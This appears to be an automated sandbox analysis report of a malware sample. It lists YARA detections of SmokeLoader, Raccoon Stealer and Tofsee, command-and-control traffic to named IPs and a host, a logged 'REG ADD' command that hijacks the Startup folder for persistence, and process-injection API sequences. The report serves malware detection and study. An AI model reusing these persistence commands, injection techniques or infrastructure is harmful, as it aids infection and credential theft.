                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:26:22 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rftojqy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49801 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49867 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49869 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49881 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49888 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 10.0.rifsswe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.0.rifsswe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.tijXCZsbGe.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.rifsswe.6315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.0.rifsswe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.1.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, type: MEMORY
                          Source: 9334.exe, 0000000B.00000000.767215703.000000000069A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.4d40e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.3.5C89.exe.4de0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.5C89.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.920325973.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000003.917559502.0000000004DF0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.931172576.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands:

                          barindex
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.3.gecrjwsv.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.580e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.E748.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E748.exe PID: 5476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gecrjwsv.exe PID: 2860, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6732, type: MEMORYSTR

                          System Summary:

                          barindex
                          PE file has nameless sectionsShow sources
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 8783.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: 9DFA.exe.5.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00425030
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0042B410
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_0042A630
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402AB3
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 9_2_00633253
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 9_2_006331FF
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402AB3
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402A5F
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_0048160C
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_004815DE
                          Source: C:\Users\user\AppData\Local\Temp\9334.exeCode function: 11_2_004815F6
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_0042B030
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_0042A250
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00424C50
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02E596F0
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02E50460
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02E50470
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02EDDE18
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02ED8658
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02EDCC48
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02ED8DE8
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02ED8DF8
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeCode function: 18_2_02ED8DF4
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_0040C913
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_0042B030
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_0042A250
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_00424C50
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: tijXCZsbGe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tijXCZsbGe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tijXCZsbGe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tijXCZsbGe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 9334.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 9334.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 9334.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C7FA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rifsswe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gecrjwsv.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeSection loaded: mscorjit.dll
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: tijXCZsbGe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\xzxafeeu\Jump to behavior
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: String function: 0041E120 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 00632794 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 0041E120 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: String function: 00422DA0 appears 132 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: String function: 0041E520 appears 171 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: String function: 0041E500 appears 31 times
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 9_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rifssweCode function: 10_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
